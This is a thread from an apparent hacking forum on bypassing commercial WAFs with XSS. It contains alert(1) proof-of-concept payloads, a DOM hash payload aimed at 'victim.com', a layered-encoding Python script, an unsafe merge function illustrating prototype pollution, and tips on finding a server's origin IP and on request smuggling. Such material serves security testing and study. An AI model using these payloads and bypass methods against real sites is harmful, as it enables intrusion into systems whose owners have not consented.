• XSS.stack #1 – первый литературный журнал от юзеров форума

Do modern XSS Bypass techniques still work against advanced WAFs?

_Sentap

Data Thug
Premium
Регистрация
14.05.2025
Сообщения
58
Реакции
52
Депозит
0.00
i was messing around with this penetration testing project lately... got stuck dealing with this super tough WAF... like, it was blocking pretty much every classic XSS payload i threw at it. tried all sorts of weird encoding tricks, played with event handlers, even dabbled in some DOM-based stuff... but this WAF? it’s like it saw everything coming! kinda frustrating...


anyway, heres my question... are there still some creative tricks out there for bypassing modern WAFs... like cloudflare, aws WAF, or akamai? stuff that actually works in the real world? i wanna know...
 
There is no fixed method for bypassing a WAF. Each WAF admin may have configured it in a specific way, and if they’ve made mistakes in the configuration, you can potentially exploit those.
Currently, two approaches come to my mind that I can suggest to you:

1. Set up the WAF locally in your own virtual lab environment, understand how it works, and then think about ways to bypass it.

2. Find the server's original IP address and send requests directly to it so the WAF won't block you.
 
There is no fixed method for bypassing a WAF. Each WAF admin may have configured it in a specific way, and if they’ve made mistakes in the configuration, you can potentially exploit those.
Currently, two approaches come to my mind that I can suggest to you:

1. Set up the WAF locally in your own virtual lab environment, understand how it works, and then think about ways to bypass it.

2. Find the server's original IP address and send requests directly to it so the WAF won't block you.
your response ain't bad, but i kinda feel like there's some room for doubt about how well these methods hold up in real-world scenarios... for bypassing, your idea of setting up a WAF in a local environment sounds solid, but how do you make sure the WAF setup in the lab is exactly like the real deal? like, cloudflare or akamai got all these dynamic rules and auto-updates... how do you simulate that stuff?

and that part where you mentioned finding the server's real IP, that makes sense too, but if the server’s sitting behind a CDN like cloudflare and the real IP only routes through the WAF, hitting the IP directly just wont work... what technique do you use to be sure you got the right IP? maybe digging into DNS history or using some tool like dnsdumpster?

i dunno, these methods feel a bit... oversimplified? modern WAFs, like AWS WAF, they’re using machine learning to spot payloads... what’s your take on that? you got any other creative ideas for testing, like messing with encoding or maybe DOM-based XSS stuff?
 
your response ain't bad, but i kinda feel like there's some room for doubt about how well these methods hold up in real-world scenarios... for bypassing, your idea of setting up a WAF in a local environment sounds solid, but how do you make sure the WAF setup in the lab is exactly like the real deal? like, cloudflare or akamai got all these dynamic rules and auto-updates... how do you simulate that stuff?

and that part where you mentioned finding the server's real IP, that makes sense too, but if the server’s sitting behind a CDN like cloudflare and the real IP only routes through the WAF, hitting the IP directly just wont work... what technique do you use to be sure you got the right IP? maybe digging into DNS history or using some tool like dnsdumpster?

i dunno, these methods feel a bit... oversimplified? modern WAFs, like AWS WAF, they’re using machine learning to spot payloads... what’s your take on that? you got any other creative ideas for testing, like messing with encoding or maybe DOM-based XSS stuff?
It depends on multiple factors, for example a lot of people / services use free cloud/waf witch has basic protection, even on xss injections. Gh0stByte is right, buy yourself a server ( not local ), enable cloud on it, install nginx with modsecurity and enable it, ask GPT to make you a xss vulnerable index and try to attack it. Change the methods and check your access/error log both of nginx and cloud. Majority of waf's have different configs, different protection types, but you can still find bypasses around it.

Many WAFs block <script> , but you can use methods such as:

JavaScript:
<iframe src="javascript:alert(1)">
( obscure tags to brake filters ) or
JavaScript:
<math><mi xlink:href="javascript:alert(1)"></mi></math>


To bypass the event handler:
JavaScript:
<body onload=alert(1)>

or

JavaScript:
<div onclick=alert(1)>Click me</div>

You can use encoded payload too
JavaScript:
<scr<script>ipt>alert(1)</scr</script>ipt>

DOM

JavaScript:
let search = location.hash;
document.body.innerHTML = search;

JavaScript:
https://victim.com/#<img src=x onerror=alert(1)>


My most favorite is:
JavaScript:
<img src="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+">
 
It depends on multiple factors, for example a lot of people / services use free cloud/waf witch has basic protection, even on xss injections. Gh0stByte is right, buy yourself a server ( not local ), enable cloud on it, install nginx with modsecurity and enable it, ask GPT to make you a xss vulnerable index and try to attack it. Change the methods and check your access/error log both of nginx and cloud. Majority of waf's have different configs, different protection types, but you can still find bypasses around it.

Many WAFs block <script> , but you can use methods such as:

JavaScript:
<iframe src="javascript:alert(1)">
( obscure tags to brake filters ) or
JavaScript:
<math><mi xlink:href="javascript:alert(1)"></mi></math>


To bypass the event handler:
JavaScript:
<body onload=alert(1)>

or

JavaScript:
<div onclick=alert(1)>Click me</div>

You can use encoded payload too
JavaScript:
<scr<script>ipt>alert(1)</scr</script>ipt>

DOM

JavaScript:
let search = location.hash;
document.body.innerHTML = search;

JavaScript:
https://victim.com/#<img src=x onerror=alert(1)>


My most favorite is:
JavaScript:
<img src="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+">
It should be noted that bypassing a WAF requires continuous trial and error, as each WAF exhibits different behavior.
 
your response ain't bad, but i kinda feel like there's some room for doubt about how well these methods hold up in real-world scenarios... for bypassing, your idea of setting up a WAF in a local environment sounds solid, but how do you make sure the WAF setup in the lab is exactly like the real deal? like, cloudflare or akamai got all these dynamic rules and auto-updates... how do you simulate that stuff?
You're absolutely right; accurately simulating advanced WAFs like Cloudflare or Akamai, with all their dynamic rules and automatic updates, in a local environment is extremely challenging and often impossible. You're justified in having doubts about this. The purpose of setting up a WAF in a local environment is more about understanding the general principles and mechanisms of how WAFs operate and testing general bypass techniques, rather than precisely reconstructing a specific WAF with all its complexities.

Sometimes, information about how specific WAFs operate or their rule categories is publicly disclosed (e.g., in blogs, security conferences). You can use this information to fine-tune your local WAF setup more accurately.

There are some tools and techniques for WAF fingerprinting that can help you identify the type of WAF and, occasionally, some of its default rules. Of course, this is more for identification than for complete simulation.

Start with a basic configuration and gradually enable stricter rules on your local WAF to see how you can manage to overcome them.

Always remember that successfully bypassing a local WAF doesn't guarantee success against an advanced, up-to-date WAF in the real world. However, it helps you develop the necessary mindset and skills to face them.

and that part where you mentioned finding the server's real IP, that makes sense too, but if the server’s sitting behind a CDN like cloudflare and the real IP only routes through the WAF, hitting the IP directly just wont work... what technique do you use to be sure you got the right IP? maybe digging into DNS history or using some tool like dnsdumpster?
Here are a few common techniques for this:

1. Using DNS history and related tools

2. Checking SSL/TLS certificates - Sometimes, the origin server might have an SSL certificate where your domain name is mentioned (e.g., a self-signed certificate or a certificate from another CA used for testing), and this certificate will be different from the one provided by the CDN. If you can connect to the suspected IP (even with a certificate error) and examine the certificate details, it can be a strong clue.

Certainly, there are more techniques, but I didn't feel it was necessary to list them all here.

i dunno, these methods feel a bit... oversimplified? modern WAFs, like AWS WAF, they’re using machine learning to spot payloads... what’s your take on that? you got any other creative ideas for testing, like messing with encoding or maybe DOM-based XSS stuff?
Advanced play with Encoding and Obfuscation (The art of misleading):

Combination of Encodings and lesser-known Encodings: Usage of multiple layers of Encoding (e.g., URL Encode > Base64 > Hex).

Leveraging Encodings that browsers understand well but WAFs might have trouble fully interpreting them (like UTF-16/UTF-32 in specific places, Punycode in parts of the URL or parameters, or even specific encodings related to programming languages like JSFuck/JJencode or hieroglyphy for JavaScript).

Usage of String.fromCharCode() in JavaScript with numerical values (decimal, hex, octal) for creating XSS payloads dynamically.

Polyglot Payloads:

Creating payloads that are valid in multiple contexts. For example, a payload that is simultaneously a valid HTML string, a valid SQL comment, and a valid JavaScript command. The WAF might detect it as harmless in one context, while in another context it is interpreted maliciously by the browser or server.

Obfuscation with non-printing or invisible characters and complex commenting: Usage of various whitespace characters (like non-breaking space, en space, em space, zero-width space) or control characters that the WAF might ignore or misinterpret, but the final interpreter (browser, database) processes them.

Usage of nested comments or comments with special syntax in SQL, HTML, JS that confuse the WAF. (e.g., /*! SQL Specific Comment */ in MySQL).

Injection through indirect sources: Instead of direct injection into a clear sink, try to inject data into the DOM through localStorage, sessionStorage, window.name, document.cookie (if it is not properly isolated), or even through postMessage from another iframe or window.

JavaScript Gadgets and Prototype Pollution: Finding code snippets (gadgets) present in JS libraries used by the website that can execute malicious code with input controlled by the attacker.

A Prototype Pollution attack can change the properties of global JavaScript objects and lead to XSS in places where you don't expect it at all. This type of attack is very hard for WAFs to detect.

Mutation XSS (mXSS): Sending seemingly harmless HTML or XML that when parsed and "corrected" (mutated) by the browser, turns into malicious code. The WAF sees the initial HTML and might detect it as harmless.

Usage of Template Literals and new JS functions: ES6 and newer versions of JavaScript have features (like template literals ${...}, arrow functions) that can be used to create XSS payloads in new and lesser-known ways for WAFs.

Service Workers and WebAssembly (WASM): If you can register a malicious service worker, you can have a lot of control over requests and responses on the client-side and bypass the WAF.

WASM payloads are almost a black box for WAFs and their analysis is very difficult.

HTTP Request Smuggling (HRS) / HTTP Desync Attacks: If the infrastructure (load balancers, reverse proxies, web servers) is not configured correctly, these attacks can allow you to hide one request inside another request and send it directly to the backend server, completely bypassing the WAF and even poisoning the cache.
 
You're absolutely right; accurately simulating advanced WAFs like Cloudflare or Akamai, with all their dynamic rules and automatic updates, in a local environment is extremely challenging and often impossible. You're justified in having doubts about this. The purpose of setting up a WAF in a local environment is more about understanding the general principles and mechanisms of how WAFs operate and testing general bypass techniques, rather than precisely reconstructing a specific WAF with all its complexities.

Sometimes, information about how specific WAFs operate or their rule categories is publicly disclosed (e.g., in blogs, security conferences). You can use this information to fine-tune your local WAF setup more accurately.

There are some tools and techniques for WAF fingerprinting that can help you identify the type of WAF and, occasionally, some of its default rules. Of course, this is more for identification than for complete simulation.

Start with a basic configuration and gradually enable stricter rules on your local WAF to see how you can manage to overcome them.

Always remember that successfully bypassing a local WAF doesn't guarantee success against an advanced, up-to-date WAF in the real world. However, it helps you develop the necessary mindset and skills to face them.


Here are a few common techniques for this:

1. Using DNS history and related tools

2. Checking SSL/TLS certificates - Sometimes, the origin server might have an SSL certificate where your domain name is mentioned (e.g., a self-signed certificate or a certificate from another CA used for testing), and this certificate will be different from the one provided by the CDN. If you can connect to the suspected IP (even with a certificate error) and examine the certificate details, it can be a strong clue.

Certainly, there are more techniques, but I didn't feel it was necessary to list them all here.


Advanced play with Encoding and Obfuscation (The art of misleading):

Combination of Encodings and lesser-known Encodings: Usage of multiple layers of Encoding (e.g., URL Encode > Base64 > Hex).

Leveraging Encodings that browsers understand well but WAFs might have trouble fully interpreting them (like UTF-16/UTF-32 in specific places, Punycode in parts of the URL or parameters, or even specific encodings related to programming languages like JSFuck/JJencode or hieroglyphy for JavaScript).

Usage of String.fromCharCode() in JavaScript with numerical values (decimal, hex, octal) for creating XSS payloads dynamically.

Polyglot Payloads:

Creating payloads that are valid in multiple contexts. For example, a payload that is simultaneously a valid HTML string, a valid SQL comment, and a valid JavaScript command. The WAF might detect it as harmless in one context, while in another context it is interpreted maliciously by the browser or server.

Obfuscation with non-printing or invisible characters and complex commenting: Usage of various whitespace characters (like non-breaking space, en space, em space, zero-width space) or control characters that the WAF might ignore or misinterpret, but the final interpreter (browser, database) processes them.

Usage of nested comments or comments with special syntax in SQL, HTML, JS that confuse the WAF. (e.g., /*! SQL Specific Comment */ in MySQL).

Injection through indirect sources: Instead of direct injection into a clear sink, try to inject data into the DOM through localStorage, sessionStorage, window.name, document.cookie (if it is not properly isolated), or even through postMessage from another iframe or window.

JavaScript Gadgets and Prototype Pollution: Finding code snippets (gadgets) present in JS libraries used by the website that can execute malicious code with input controlled by the attacker.

A Prototype Pollution attack can change the properties of global JavaScript objects and lead to XSS in places where you don't expect it at all. This type of attack is very hard for WAFs to detect.

Mutation XSS (mXSS): Sending seemingly harmless HTML or XML that when parsed and "corrected" (mutated) by the browser, turns into malicious code. The WAF sees the initial HTML and might detect it as harmless.

Usage of Template Literals and new JS functions: ES6 and newer versions of JavaScript have features (like template literals ${...}, arrow functions) that can be used to create XSS payloads in new and lesser-known ways for WAFs.

Service Workers and WebAssembly (WASM): If you can register a malicious service worker, you can have a lot of control over requests and responses on the client-side and bypass the WAF.

WASM payloads are almost a black box for WAFs and their analysis is very difficult.

HTTP Request Smuggling (HRS) / HTTP Desync Attacks: If the infrastructure (load balancers, reverse proxies, web servers) is not configured correctly, these attacks can allow you to hide one request inside another request and send it directly to the backend server, completely bypassing the WAF and even poisoning the cache.
Wow, that’s a seriously detailed response—big props for diving so deep! I’m definitely taking notes on some of these ideas, especially the encoding tricks and mutation XSS stuff. The way you broke down polyglot payloads and prototype pollution was eye-opening; I hadn’t thought about combining contexts like that to slip past a WAF.


Couple of follow-ups, if you don’t mind:


  1. Encoding and Obfuscation: You mentioned layering encodings like URL > Base64 > Hex or using stuff like UTF-16/UTF-32. Have you seen these work against something as beefy as Cloudflare’s ML-based rules? Like, do you think throwing in something super obscure like Punycode in a URL parameter could still trip up their detection, or are they catching up to these tricks? Any go-to tools or scripts you’d recommend for generating these layered payloads?
  2. Mutation XSS: The mXSS idea sounds wild, but I’m curious how you’d approach crafting one in practice. Say you’ve got a site that’s reflecting user input into HTML but sanitizing it pretty aggressively—how do you figure out what “harmless” input might get mutated by the browser into something spicy? Is it mostly trial and error, or are there specific patterns you look for?
  3. Prototype Pollution: I’ve read about this but never tried it in a real pentest. You said it’s tough for WAFs to detect, which makes sense since it’s more about messing with the app’s logic than a straight-up payload. Got any tips on how to spot a site that might be vulnerable to this? Like, are there specific JS libraries or frameworks that are more prone to it?

Oh, and about the HTTP Request Smuggling part—that’s super intriguing, but feels like it’d need some serious recon to pull off. Have you ever seen it work in the wild against a modern setup with a CDN + WAF combo? I’m wondering how common misconfigs like that are these days.


On my end, I’ve been messing with some DOM-based XSS ideas lately, like trying to abuse postMessage or window.name as you mentioned. One thing I’ve noticed is that some sites don’t properly validate the origin of postMessage, which can let you sneak in some fun stuff. But yeah, modern WAFs are such a pain when they start sniffing out your payloads with ML.


What’s your take on combining some of these techniques? Like, maybe using a polyglot payload with some mXSS flavor to target a DOM-based vector? Or is that overcomplicating things? 😅
 
You're absolutely right; accurately simulating advanced WAFs like Cloudflare or Akamai, with all their dynamic rules and automatic updates, in a local environment is extremely challenging and often impossible. You're justified in having doubts about this. The purpose of setting up a WAF in a local environment is more about understanding the general principles and mechanisms of how WAFs operate and testing general bypass techniques, rather than precisely reconstructing a specific WAF with all its complexities.

Sometimes, information about how specific WAFs operate or their rule categories is publicly disclosed (e.g., in blogs, security conferences). You can use this information to fine-tune your local WAF setup more accurately.

There are some tools and techniques for WAF fingerprinting that can help you identify the type of WAF and, occasionally, some of its default rules. Of course, this is more for identification than for complete simulation.

Start with a basic configuration and gradually enable stricter rules on your local WAF to see how you can manage to overcome them.

Always remember that successfully bypassing a local WAF doesn't guarantee success against an advanced, up-to-date WAF in the real world. However, it helps you develop the necessary mindset and skills to face them.


Here are a few common techniques for this:

1. Using DNS history and related tools

2. Checking SSL/TLS certificates - Sometimes, the origin server might have an SSL certificate where your domain name is mentioned (e.g., a self-signed certificate or a certificate from another CA used for testing), and this certificate will be different from the one provided by the CDN. If you can connect to the suspected IP (even with a certificate error) and examine the certificate details, it can be a strong clue.

Certainly, there are more techniques, but I didn't feel it was necessary to list them all here.


Advanced play with Encoding and Obfuscation (The art of misleading):

Combination of Encodings and lesser-known Encodings: Usage of multiple layers of Encoding (e.g., URL Encode > Base64 > Hex).

Leveraging Encodings that browsers understand well but WAFs might have trouble fully interpreting them (like UTF-16/UTF-32 in specific places, Punycode in parts of the URL or parameters, or even specific encodings related to programming languages like JSFuck/JJencode or hieroglyphy for JavaScript).

Usage of String.fromCharCode() in JavaScript with numerical values (decimal, hex, octal) for creating XSS payloads dynamically.

Polyglot Payloads:

Creating payloads that are valid in multiple contexts. For example, a payload that is simultaneously a valid HTML string, a valid SQL comment, and a valid JavaScript command. The WAF might detect it as harmless in one context, while in another context it is interpreted maliciously by the browser or server.

Obfuscation with non-printing or invisible characters and complex commenting: Usage of various whitespace characters (like non-breaking space, en space, em space, zero-width space) or control characters that the WAF might ignore or misinterpret, but the final interpreter (browser, database) processes them.

Usage of nested comments or comments with special syntax in SQL, HTML, JS that confuse the WAF. (e.g., /*! SQL Specific Comment */ in MySQL).

Injection through indirect sources: Instead of direct injection into a clear sink, try to inject data into the DOM through localStorage, sessionStorage, window.name, document.cookie (if it is not properly isolated), or even through postMessage from another iframe or window.

JavaScript Gadgets and Prototype Pollution: Finding code snippets (gadgets) present in JS libraries used by the website that can execute malicious code with input controlled by the attacker.

A Prototype Pollution attack can change the properties of global JavaScript objects and lead to XSS in places where you don't expect it at all. This type of attack is very hard for WAFs to detect.

Mutation XSS (mXSS): Sending seemingly harmless HTML or XML that when parsed and "corrected" (mutated) by the browser, turns into malicious code. The WAF sees the initial HTML and might detect it as harmless.

Usage of Template Literals and new JS functions: ES6 and newer versions of JavaScript have features (like template literals ${...}, arrow functions) that can be used to create XSS payloads in new and lesser-known ways for WAFs.

Service Workers and WebAssembly (WASM): If you can register a malicious service worker, you can have a lot of control over requests and responses on the client-side and bypass the WAF.

WASM payloads are almost a black box for WAFs and their analysis is very difficult.

HTTP Request Smuggling (HRS) / HTTP Desync Attacks: If the infrastructure (load balancers, reverse proxies, web servers) is not configured correctly, these attacks can allow you to hide one request inside another request and send it directly to the backend server, completely bypassing the WAF and even poisoning the cache.
Thank you very much, ChatGPT!
 
i was messing around with this penetration testing project lately... got stuck dealing with this super tough WAF... like, it was blocking pretty much every classic XSS payload i threw at it. tried all sorts of weird encoding tricks, played with event handlers, even dabbled in some DOM-based stuff... but this WAF? it’s like it saw everything coming! kinda frustrating...


anyway, heres my question... are there still some creative tricks out there for bypassing modern WAFs... like cloudflare, aws WAF, or akamai? stuff that actually works in the real world? i wanna know...
In general, wafs are bypassed with various loopholes in the documentation. Some geniuses come up with ways to bypass the filters themselves, but as our friend with chatgpt noted, this is often impossible. All bypasses of Cloud and Akamai are private and are fixed very quickly. Therefore, if we are talking about cloudflare - look for real IPs that are behind the reverse proxy, if we are talking about Akamai and Amazon, make a chain of other vulnerabilities - xxe, lfi etc.
 
In general, wafs are bypassed with various loopholes in the documentation. Some geniuses come up with ways to bypass the filters themselves, but as our friend with chatgpt noted, this is often impossible. All bypasses of Cloud and Akamai are private and are fixed very quickly. Therefore, if we are talking about cloudflare - look for real IPs that are behind the reverse proxy, if we are talking about Akamai and Amazon, make a chain of other vulnerabilities - xxe, lfi etc.
i totally agree that bypassing modern WAFs like cloudflare, aws waf, or akamai aint easy at all... most bypasses are either private or get patched super quick. finding the real ip behind cloudflare is such a cool idea tho... sometimes you can crack open a path that way (like using tools like subfinder or some osint tricks). im totally on board with chaining vulnerabilities like xxe or lfi too... those usually work when you spot another weak point in the system and can exploit it...
got a question tho. in your experience, what kind of techniques do you focus on for testing wafs? like, you mostly hunt for misconfigurations? or do you try to craft some creative payloads? maybe youve worked on stuff like rate limit bypass or api abuse? really wanna hear your thoughts!
 
put the waf in the shitter. flush it. CF bypass can cost you $8kk
 
put the waf in the shitter. flush it. CF bypass can cost you $8kk
what, you got a chip on your shoulder or just naturally a sourpuss? we’re trying to keep it technical here... so maybe dial it back and play nice, yeah?
 
Encoding and Obfuscation: You mentioned layering encodings like URL > Base64 > Hex or using stuff like UTF-16/UTF-32. Have you seen these work against something as beefy as Cloudflare’s ML-based rules? Like, do you think throwing in something super obscure like Punycode in a URL parameter could still trip up their detection, or are they catching up to these tricks? Any go-to tools or scripts you’d recommend for generating these layered payloads?
So, you know, when we talk about URL encoding a string first, then Base64, and then Hex, that's what I'd call a classic obfuscation method. I've seen older WAFs, the ones that only did a single layer of decoding, sometimes get tricked by these. But with modern WAFs, especially the ML-based ones, it’s a bit of a different story.

From what I understand, they usually have a multi-layer decoding capability. I mean, they're generally designed to spot and decode several layers of common encodings, not just glancing at how the string first appears.

And then there's the behavioral and contextual analysis. My take is, even if an encoded string doesn't directly match a known malicious signature, the ML model can flag it as suspicious based on other contextual clues. For instance, it might consider how common that type of encoding is for that specific parameter, or if that parameter typically handles such complex data, things like that.

Also, I think it's more about risk scoring with these systems, rather than a simple block or don't block decision. They usually assign a risk score to requests based on various factors, and I'd imagine using multiple encoding layers could bump up that risk score.

For example, if you use Punycode in a URL parameter where you wouldn't normally expect it – because, as I recall, Punycode is for international domain names or IDNs – or using UTF-16 or UTF-32 where UTF-8 is the norm, I'd say that can definitely be an anomaly.

And that leads to anomaly detection. From my perspective, ML models are designed precisely for that – to spot anomalies. So, if a particular parameter has always been getting simple ASCII data and then suddenly it receives a complex Punycode string, I'd see that as a potential red flag for the system.

It really comes down to sensitivity to context, in my opinion. I believe the real strength of ML is in understanding that context. A Punycode string in a Host header might be perfectly fine, but that same string in a user_id parameter could look very suspicious to me, and presumably to the system too.

Now, about the possibility of error... I'd say, sure, it's possible such tricks could make the system slip up. In my experience, no security system is 100 percent foolproof.

As for tools, I don't really have a specific one offhand for generating these kinds of payloads myself, but I reckon you could whip up a simple tool for it. For instance, you could make a basic one with Python:
Python:
import base64
import urllib.parse

original_payload = "<script>alert('XSS')</script>"

payload_b64 = base64.b64encode(original_payload.encode('utf-8')).decode('utf-8')
print(f"Base64 Encoded: {payload_b64}")

payload_url_encoded_b64 = urllib.parse.quote(payload_b64)
print(f"URL Encoded (Base64): {payload_url_encoded_b64}")

payload_hex = original_payload.encode('utf-8').hex()
print(f"Hex Encoded: {payload_hex}")

Mutation XSS: The mXSS idea sounds wild, but I’m curious how you’d approach crafting one in practice. Say you’ve got a site that’s reflecting user input into HTML but sanitizing it pretty aggressively—how do you figure out what “harmless” input might get mutated by the browser into something spicy? Is it mostly trial and error, or are there specific patterns you look for?
From what I gather, this whole process is a mix of deeply understanding how browsers work, recognizing common mXSS patterns, and some smart trial and error. Now, I haven't studied or worked on this super deeply myself, but here’s what I do know about it:

So, first, about understanding the difference between a Sanitizer and a browser. When I think of a Sanitizer or a WAF, I see it as usually having a simpler parser. It might operate based on a blacklist or a whitelist, you know, searching and replacing strings, or maybe it builds a partial Document Object Model, or DOM, and then cleans that up. Its main goal, as I see it, is to get rid of known malicious code.

The browser, on the other hand, has what I’d call a very complex and flexible parser. It's built to display any kind of HTML code correctly, or at least acceptably, even if that code is incomplete or incorrect. Browsers often try to, let's say, 'fix' broken code, and that’s where this 'mutation' thing happens, in my understanding.

Then there are these key points where browsers might mutate the code:

One thing is malformed HTML. For instance, with unclosed tags: I believe the browser might close tags in a specific way or interpret the content after them differently than a sanitizer would expect. An example could be something like <img src=x onerror=alert(1) without quotes. Or mismatched or missing quotes, like in <a href='javascript:alert(1)">. Unexpected characters inside tags or attributes: from what I've seen, the browser might interpret these as separators. And incorrect comments: these might get closed by the browser sooner than expected, or so I've heard.

Then you have different namespaces, like SVG and MathML. As I understand it, the SVG and MathML parsers are different from the HTML parser. Sanitizers might not handle these spaces correctly. So, code injection through a <script> tag inside an <svg>, or via event handlers on SVG elements if parts of the SVG are user-controlled, might be possible. I also think the <foreignObject> element in SVG can be an attack vector.

Regarding the <template> element: from what I know, the content of a <template> tag is inert until it's cloned and added to the DOM. A sanitizer might not recursively sanitize the content within the template, or it might do it incorrectly. Then, once the browser activates the template, it will parse its content.

And the usage of innerHTML: The way a string is injected into element.innerHTML can sometimes, as I see it, lead to different parsing results compared to when the browser parses HTML directly from the network stream. I believe this is one of the common sources of mXSS. The browser seems to perform an extra 'correction' step on the string before converting it to the DOM.

Finally, DOM Clobbering: while it's not exactly mXSS, I think it can be a precursor or a supplement to it. If user input can create DOM elements with a specific id or name, it might overwrite global JavaScript variables or their properties, potentially leading to unexpected behavior that could be exploited. That's my understanding, at least.


Now, about the diagnostic process – you asked if it's more based on trial and error or specific patterns? From what I can tell, this process is a combination of both:

First, there are what I'd call known patterns. Security researchers, folks like Mario Heiderich, Gareth Heyes, and the team at PortSwigger Research, have discovered and published common patterns and browser weaknesses. I find these patterns are a good starting point. For example: One thing is using invalid attributes where parts of them get interpreted by the browser as new HTML. Then there's injection into special tags like <style>, <title>, <textarea>, <noscript>, or <iframe>, which, as I understand it, have different parsing rules. Playing around with CDATA in an XML context, like SVG, is another area I've heard about. And also, using special characters or different encodings in unexpected places. I also think the test lists from well-known sanitizing libraries, like DOMPurify – which itself is designed to prevent mXSS – are a fantastic resource for understanding mXSS attack vectors.

Next is what I'd call intelligent trial and error, or fuzzing. Since browser behavior can vary a bit between versions and types, and the sanitizer's logic is often a black box, a significant amount of targeted fuzzing and repetitive manual testing is needed, from my point of view.

Differential analysis is a key technique here, as I see it. You give your input to the application, and then you compare the sanitized HTML – what comes back from the server or is produced by a client-side sanitizer – with what the browser actually displays in the DOM Inspector.

Let me try to give a simple conceptual example. Suppose the sanitizer removes <script> tags and the onerror attribute. Your input might be something like: <img src="x" foo="><script>alert(1)</script>">. The sanitizer might see foo as an attribute, remove the inner <script> content, and output: <img src="x" foo=">">. The browser, then, might – and this is where the mutation comes in – because of how it handles an unescaped > in the attribute value, parse this as: <img src="x" foo=""> <script>alert(1)</script> ">. In this scenario, the script tag that the sanitizer thought it removed reappears. (I should say, this is a very simplified example; real-world cases are often more complex and depend on the specifics of how the browser engine parses HTML).

It seems to me that focusing on inputs that appear to break or make the HTML structure incomplete is important. Often, mXSS vectors involve inputs that look like they mess up the HTML structure, but the browser then 'repairs' them in a particular way.

So, I'd say you start with specific patterns, for example, known mXSS vectors for innerHTML, or how the browser handles particular tags in certain contexts. Then, when you encounter a specific sanitizer, you'd move into the trial-and-error phase to see which of these patterns, or slight variations of them, can get past that sanitizer and be mutated by the browser into something malicious.

From what I can tell, finding new mXSS vulnerabilities against strong, modern sanitizers is tough work. It requires patience, creativity, and a deep understanding of browser internals. But when they are found, I believe they are very valuable.

Prototype Pollution: I’ve read about this but never tried it in a real pentest. You said it’s tough for WAFs to detect, which makes sense since it’s more about messing with the app’s logic than a straight-up payload. Got any tips on how to spot a site that might be vulnerable to this? Like, are there specific JS libraries or frameworks that are more prone to it?
So, about understanding the core mechanism here:

When it comes to vulnerable entry points and code patterns:
I think doing a source code review, if the code is available, of course, is the most effective way to go about it. One thing I'd look for is unsafe recursive merge or copy functions. I mean, you'd search for functions that deeply combine, you know, deep merge or clone, two or more objects. If these functions treat the __proto__ key as a valid key and copy its value into the target object, then, in my view, a vulnerability exists. Let me give a very simple example:
JavaScript:
function merge(target, source) {
  for (let key in source) {
    if (typeof source[key] === 'object' && source[key] !== null) {
      if (!target[key]) target[key] = {};
      merge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
}
Then there's the dynamic setting of properties. What I mean is, code that takes a property path from user input and assigns a value to it, that's something I'd consider susceptible. For instance, if you have something like obj[pathPart1][pathPart2] = value;, if you could change pathPart1 or pathPart2 to __proto__, that's where the problem lies, as I see it.

Also, I'd look at how the application uses URL parameters, the JSON body, or postMessage to create or modify objects. It's worth checking, in my opinion, how the program processes these inputs and whether it uses them to build nested object structures.


Black-Box Testing

Now, about black-box testing. I find this more challenging, but not impossible.

For identifying input points, I'd say anywhere the application takes user input and seems to create or modify JavaScript objects with it – whether that's client-side or server-side in Node.js – is a potential spot. This, in my view, includes things like: Query parameters in the URL, for example ?config.setting.value=foo The JSON request body Data sent via window.postMessage Form inputs


Susceptible JavaScript libraries and frameworks

And then there are certain JavaScript libraries and frameworks that I've heard are more susceptible:

Talking about older versions of utility libraries: With Lodash, for instance, I understand that versions before 4.17.11 had Prototype Pollution vulnerabilities in functions like _.defaultsDeep, _.merge, _.set, and so on. I believe many projects still use these older versions. Then there's jQuery. Older versions, especially before 3.4.0 from what I recall, could be vulnerable in the $.extend(true, {}, ...) function when doing a deep copy from an unsafe source, like the output of JSON.parse from user input. Underscore.js is another one; similar to Lodash, I think older versions can be vulnerable.

I'd also be wary of URL or Query String processing libraries. Libraries that convert query string parameters into nested objects might create this vulnerability if they don't properly check the keys, for example, converting a[b][c]=val to {a:{b:{c:'val'}}} without scrutiny.

Template engines are another area. Some of them, especially those that work unsafely with objects or allow access to nested properties, could be an attack vector, in my opinion, if a polluted object is passed to them.

And libraries that work with YAML or other formats too. If these libraries don't check keys when they deserialize input into JavaScript objects, I think they could be vulnerable.


Finding Gadgets

As I see it, just polluting the prototype isn't enough. For this vulnerability to have a real impact, a 'gadget' needs to be found in the application's code. A gadget, in my understanding, is a piece of code that uses the polluted property from the prototype in a way that leads to an unintended and exploitable behavior. For example:

Code that considers a property as a URL or places it in innerHTML. If this property has been polluted via the prototype, I believe it could lead to XSS.

Oh, and about the HTTP Request Smuggling part—that’s super intriguing, but feels like it’d need some serious recon to pull off. Have you ever seen it work in the wild against a modern setup with a CDN + WAF combo? I’m wondering how common misconfigs like that are these days.
Yeah, from what I've seen, it definitely still works. It might sound surprising, I know, but even with CDNs, advanced WAFs, and modern infrastructures, I believe vulnerabilities stemming from HRS are still being found. As I understand it, the main reasons for this are:

First off, there's what I'd call Request Chain Complexity. A user's request usually passes through several devices: the user's browser, then a CDN, like Cloudflare or Akamai, then a WAF which might be part of the CDN or separate, then Load Balancer(s), then Reverse Proxy(s), and finally the application's web server, or Origin. The HRS vulnerability, as I see it, happens when at least two devices in this chain understand the boundary of an HTTP request differently. This is usually due to ambiguity in the Content-Length and Transfer-Encoding headers. So, if the CDN sees a request one way, and the backend server, or Origin, or even a Load Balancer in between, interprets it another way, that’s when the possibility of request smuggling arises, in my view.

Then, I think there are differences in HTTP Parser implementations. Each of these devices – the CDN, WAF, Load Balancer, web server – has its own specific HTTP parser. These parsers might have been written by different teams and with varying degrees of adherence to RFC standards, or even different interpretations of those standards. I believe these differences can create gaps for HRS attacks.

And also, CDNs and WAFs can themselves be the vulnerable point or even create the vulnerability. Sometimes, from what I've read, the CDN or WAF itself can be one of the vulnerable parties in an HRS attack. In other cases, the CDN or WAF might 'normalize' or change requests in such a way that they unintentionally create a vulnerable situation for HRS between themselves and the backend server. For instance, a CDN might remove or alter an ambiguous Transfer-Encoding header, but the backend server might still act based on it, or vice versa. That's how I see it, anyway.

What’s your take on combining some of these techniques? Like, maybe using a polyglot payload with some mXSS flavor to target a DOM-based vector? Or is that overcomplicating things? 😅
